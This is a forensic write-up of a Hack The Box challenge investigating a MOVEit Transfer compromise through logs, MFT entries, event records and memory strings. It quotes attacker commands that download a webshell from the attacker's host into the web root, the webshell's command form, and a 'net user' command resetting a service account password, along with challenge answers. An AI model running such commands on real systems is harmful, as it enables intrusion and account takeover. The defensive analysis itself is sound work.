i-like-to
 | Released | 2023-11-13 |
| Retired | 2023-11-17 | |
| Author | sebh24 |
Scenario
Task 01
Question: Name of the ASPX webshell uploaded by the attacker?
Part of the triage data collected by KAPE is the ConsoleHost_history.txt file of the moveitsvc user. On Windows systems, this file (if it exists) is stored separately for each user in the directory: %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline This file is responsible for recording everything that is entered into the PowerShell console. By default, the last 4,096 commands are saved.
cd C:\inetpub\wwwroot
wget http://10.255.254.3:9001/moveit.asp
dir
wget http://10.255.254.3:9001/moveit.asp -OutFile moveit.asp
dir
cd C:\MOVEitTransfer\wwwroot
wget http://10.255.254.3:9001/move.aspx -OutFile move.aspx
Answer: move.aspx
Task 02
Question: What was the attacker’s IP address?
From the ConsoleHost_history.txt file mentioned in Task 01, the attacker’s IP address can also be determined, as the web shell was retrieved from a system under their control using the wget command.
Answer: 10.255.254.3
Task 03
Question: What user agent was used to perform the initial attack?
With the known IP address 10.255.254.3 and the known filename of the web shell move.aspx, it is possible to determine the user agent used by the attacker from the available IIS logs (u_ex230712.log). These logs are located by default under %SystemDrive%\inetpub\logs\LogFiles and are part of the triage data. The first requests from this IP begin on July 12, 2023, at 10:11:15, with the user agent *Nmap+Scripting+Engine* until 10:11:23, indicating that the system was scanned using nmap. Following that, a regular GET request is made from the same IP using a Firefox browser on a *Linux x86_64* system targeting the / path. This request receives an HTTP 302 redirect to /human.aspx, after which additional files for the website are requested. At 10:21:52, the user agent changes again: from this point onward, requests originate from a client identifying only as Ruby, sending various GET and POST requests repeatedly.
2023-07-12 10:21:52 10.10.0.25 GET / - 443 - 10.255.254.3 Ruby - 200 0 0 78
[...]
2023-07-12 10:21:53 10.10.0.25 GET /moveitisapi/moveitisapi.dll action=m2 443 - 10.255.254.3 Ruby - 200 0 0 818
[...]
2023-07-12 10:21:53 10.10.0.25 GET /moveitisapi/moveitisapi.dll action=m2 443 - 10.255.254.3 Ruby - 200 0 0 206
2023-07-12 10:24:52 10.10.0.25 GET / - 443 - 10.255.254.3 Ruby - 200 0 0 89
[...]
2023-07-12 10:24:52 10.10.0.25 GET /moveitisapi/moveitisapi.dll action=m2 443 - 10.255.254.3 Ruby - 200 0 0 131
2023-07-12 10:24:54 10.10.0.25 POST /guestaccess.aspx - 443 - 10.255.254.3 Ruby - 200 0 0 494
2023-07-12 10:24:54 10.10.0.25 POST /guestaccess.aspx - 443 - 10.255.254.3 Ruby - 200 0 0 677
2023-07-12 10:24:55 10.10.0.25 POST /api/v1/token - 443 - 10.255.254.3 Ruby - 200 0 0 603
2023-07-12 10:24:57 10.10.0.25 GET /api/v1/folders - 443 - 10.255.254.3 Ruby - 200 0 0 920
This request behavior is consistent with public reports regarding the MOVEit Transfer RCE (CVE-2023-34363), indicating that this was an attempted attack.
Answer: Ruby
Task 04
Question: When was the ASPX webshell uploaded by the attacker?
Also part of the triage data is a copy of the Master File Table ($MFT) from the NTFS file system used by Microsoft. This table contains metadata for all existing (and partially deleted) files on the disk.The $MFT can be converted into a more processable format (CSV, JSON) using MFTECmd by Eric Zimmerman. Entry 1,293 refers to the file move.aspx and shows a (shortened) creation timestamp of 11:24:30 on July 12, 2023, which aligns with the previously established timeline.
{
"EntryNumber": 1293,
"ParentPath": ".\\MOVEitTransfer\\wwwroot",
"FileName": "move.aspx",
"FileSize": 1400,
"Created0x10": "2023-07-12T11:24:30.4297594+00:00"
}
Answer: 12/07/2023 11:24:30
Task 05
Question: The attacker uploaded an ASP webshell which didn’t work, what is its filesize in bytes?
As seen in the previous task, the generated mft.json from the Master File Table (MFT) of the NTFS system also contains the file sizes of created and deleted files. From the ConsoleHost_history.txt in Task 01, the filename of the ASP web shell is known: moveit.asp. There are two entries for this file (IDs 100,896 and 273,729), indicating that the attacker made two attempts to save it. Both entries have different timestamps and file paths, but are otherwise identical.
{
"EntryNumber": 100896,
"ParentPath": ".\\MOVEitTransfer\\wwwroot",
"FileName": "moveit.asp",
"FileSize": 1362,
"Created0x10": "2023-07-12T11:19:37.3316397+00:00"
}
Answer: 1362
Task 06
There appears to be a numbering error in the HTB task sequence, one task number is missing or skipped.
Task 07
Question: Which tool did the attacker use to initially enumerate the vulnerable server?
As already identified in Task 03 during the investigation of the initial attack, the IIS logs (u_ex230712.log) also contain the user agent Mozilla/5.0+(compatible;+Nmap+Scripting+Engine;+https://nmap.org/book/nse.html This indicates the tool that was used in the attack.
Answer: nmap
Task 08
Question: We suspect the attacker may have changed the password for our service account. Please confirm the time this occurred (UTC)
In addition to the log files processed so far, the triage package also contains Windows Event Logs. These can be viewed and filtered in Windows using the Event Viewer. Alternatively, they can be converted to CSV or JSON using tools like EvtxECmd or aggregated and prefiltered for further use with hayabusa from Yamato-Security. Windows records attempted password changes made by a user with Event ID 4723 and attempted password resets with Event ID 4724 in the Security Log. Only one of the entries fits the known timeframe and the known user.
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<EventID>4724</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2023-07-12T11:09:27.8648235Z" />
<EventRecordID>60772</EventRecordID>
<Correlation ActivityID="{c2cb8fb7-9dd8-0001-2d90-cbc2d89dd901}" />
<Execution ProcessID="652" ThreadID="8052" />
<Channel>Security</Channel>
<Computer>mover</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">moveitsvc</Data>
<Data Name="TargetDomainName">MOVER</Data>
<Data Name="TargetSid">S-1-5-21-4088429403-1159899800-2753317549-1006</Data>
<Data Name="SubjectUserSid">S-1-5-21-4088429403-1159899800-2753317549-1006</Data>
<Data Name="SubjectUserName">moveitsvc</Data>
<Data Name="SubjectDomainName">MOVER</Data>
<Data Name="SubjectLogonId">0x8d5ab</Data>
</EventData>
</Event>
Answer: 12/07/2023 11:09:27
Task 09
Question: Which protocol did the attacker utilize to remote into the compromised machine?
In addition to the previously mentioned password changes, the Windows Event Log also records every user login with Event ID 4624. Different types of logins can be distinguished by the attribute LogonType, which (in short) are:
`2` | Interactive: Password entry via keyboard or RUNAS
`3` | Network: net use or PowerShell WinRM
`5` | Service: Start of a service as a user
`10` | RemoteInteractive: Login via Terminal or RDP
Since the question relates to a remote connection, only events with LogonType 3 or 10 are relevant. For the known timeframe and the compromised user, three events are of interest (60,776; 60,793; and 60,794), all originating from the attacker’s IP. The last two events with LogonType=10 indicate a login via RDP.
[
{
"Timestamp": "2023-07-12 13:11:15.849 +02:00",
"EventID": 4624,
"RecordID": 60776,
"RuleTitle": "Logon (Network)",
"Details": {
"SrcIP": "10.255.254.3",
"TgtUser": "moveitsvc",
"Type": "3 - NETWORK"
}
},
{
"Timestamp": "2023-07-12 13:11:18.665 +02:00",
"EventID": 4624,
"RecordID": 60793,
"RuleTitle": "Logon (RemoteInteractive (RDP)) *Creds in memory*",
"Details": {
"SrcIP": "10.255.254.3",
"TgtUser": "moveitsvc",
"Type": "10 - REMOTE INTERACTIVE"
}
},
{
"Timestamp": "2023-07-12 13:11:18.665 +02:00",
"EventID": 4624,
"RecordID": 60794,
"RuleTitle": "Logon (RemoteInteractive (RDP)) *Creds in memory*",
"Details": {
"SrcIP": "10.255.254.3",
"TgtUser": "moveitsvc",
"Type": "10 - REMOTE INTERACTIVE"
}
}
]
Answer: RDP
Task 10
Question: Please confirm the date and time the attacker remotely accessed the compromised machine?
Using the event from the previous task, the exact time of the attacker’s remote access can be determined. Due to the timestamp "Timestamp": "2023-07-12 13:11:18.665 +02:00" on the analysis system, 2 hours must be subtracted from the displayed time to calculate the desired UTC time. This can be verified by checking the original event from the triage file: <TimeCreated SystemTime="2023-07-12T11:11:18.6654341Z" />
Answer: 12/07/2023 11:11:18
Task 11
Question: What was the useragent that the attacker used to access the webshell?
With the known name of the web shell from Task 01 and the known IP address of the attacker from Task 02, access to the web shell can be identified in the IIS logs.
2023-07-12 11:24:43 10.10.0.25 GET /move.aspx - 443 - 10.255.254.3 Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 200 0 0 1179
2023-07-12 11:24:47 10.10.0.25 POST /move.aspx - 443 - 10.255.254.3 Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0 https://moveit.htb/move.aspx 200 0 0 159
Answer: Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0
Task 12
Question: What is the inst ID of the attacker?
The unused artifact from the triage package, moveit.sql, is a MySQL 10.13 database dump describing the service’s database. This table can either be imported back into a database for further analysis or processed directly in text form. Within it, there is a table named log that records all actions of the service. In the database dump, the INSERT statement is on line 1,611 and contains all actions from various instances. On the known day, 16 accesses are logged.
INSERT INTO `log` VALUES
(40,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','c66788d4d7ca1da7f57f2238b840663009cfcca8','',0,'','',40,0),
(41,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','f46377dcbb1bd462d0ba5bbd05ee7a7b6fa4335f','',0,'','',40,0),
(42,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','4cf54d4aa541ca00525e5ce8a4bff53da36faa29','',0,'','',40,0),
(43,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','de1128b8551c7b201b93d06c4e9499b437f55ae4','',0,'','',40,0),
(44,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','804fc0419b81ba9360ce0efe4bc14e238cb9ba86','',0,'','',40,0),
(45,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','c745089b0778ac200e9d9e72fd6aa6defee6f0fd','',0,'','',40,0),
(50,'2023-07-12 02:25:03','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','b8e83822ff1d4578dd4908afb8c44f95bc3c8046','',966871855,'/Messages/Global Messaging','',10,0),
(51,'2023-07-12 02:25:55','sec_signon',3636,'vcjoaquq',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','Firefox Browser','102.0',0,0,'','',0,'','','1ec28c66956851f6060f28b17b60354911c5f390','',0,'','',10,0),
(52,'2023-07-12 02:26:15','sec_signon',3636,'icfshlla',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','Firefox Browser','102.0',0,0,'','',0,'','','e3b18a7f31a1578d044395b1a1e2f3671aff6bb5','',0,'','',10,0),
(57,'2023-07-12 02:47:11','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','9a483b59e0960ab38798ceea5900842e11b46216','',966871855,'/Messages/Global Messaging','',10,0),
(62,'2023-07-12 03:01:05','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','4076bf57319439239ea8f145fd3450f6f312542b','',966871855,'/Messages/Global Messaging','',10,0),
(67,'2023-07-12 03:01:56','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','af7dbfa81b0f63f6122e0a8aa736ec76d7cbc659','',966871855,'/Messages/Global Messaging','',10,0),
(72,'2023-07-12 03:04:43','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','189992f80c8b6e881fc18f48f46ab90da25e6e41','',966871855,'/Messages/Global Messaging','',10,0),
(77,'2023-07-12 03:06:42','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','ff49964e7ac34421ffb354279137a20d56e5d52f','',966871855,'/Messages/Global Messaging','',10,0),
(82,'2023-07-12 03:07:30','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','06b088eb422d27f7405ae0959b7a4d516745acb2','',966871855,'/Messages/Global Messaging','',10,0),
(87,'2023-07-12 03:08:37','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','f7d509bea8c67ed46f339f053fd0e648aad4088d','',966871855,'/Messages/Global Messaging','',10,0);
There are 8 accesses from instance 3636 and the remaining 8 from 1234. The first 8 are (failed) attempts to access the service via FTP. A Google search for InstID 1234 and the CVE yields multiple results, such as a proof of concept (PoC) by sfewer-r7 (in Ruby) and the Metasploit module (which references the aforementioned PoC).
Answer: 1234
Task 13
Question: What command was run by the attacker to retrieve the webshell?
The command is visible in the ConsoleHost_history.txt used in Task 01.
Answer: wget http://10.255.254.3:9001/move.aspx -OutFile move.aspx
Task 14
Question: What was the string within the title header of the webshell deployed by the TA?
Since there is no VMSS file available for the VMEM image (see scenario description), advanced memory analysis cannot be performed. However, all strings can be extracted and searched from the dump using the strings command. To find the title of the web shell, you can search for the filename move.aspx known from Task 01. One of the hits also contains the title of the web shell.
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form name="cmd" method="post" action="./move.aspx" id="cmd">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2MjA0MDg4ODhkZNVOZ3tV2TCTi+hEkha/q+A+5xP6tvrMtJaEupnndGLi" />
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="678AED88" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAANhi3zf7ocw6tYhjdSr5BwWitssAmaVIY7AayhB9duwcnk2JDuMxrvKtMBUSvskgfEkJOF+BOsGxdOjAd7jGUjGbwkQ2wl4sKonDxvg+iiKWg==" />
<input name="txtArg" type="text" value="whoami" id="txtArg" style="width:250px;Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" />
<input type="submit" name="testing" value="excute" id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" />
<span id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px">Command:</span>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->
Based on the comments at the end of the file, the web shell can be identified as an ASPX web shell. This type of web shell can, for example, be viewed in the BlackArch repository on GitHub.
Answer: awen asp.net webshell
Task 15
Question: What did the TA change the our moveitsvc account password to?
The strings extracted from the VMEM image can be used to search for keywords indicating a password change. These include the username moveitsvc (12,837 hits), the command net user (75 hits), which can be used to modify user accounts, and the PowerShell module Set-LocalUser (1 hit). However, there is only one combined hit containing both net user and moveitsvc, which corresponds to the attacker’s command.
net user "moveitsvc" 5trongP4ssw0rd
Answer: 5trongP4ssw0rd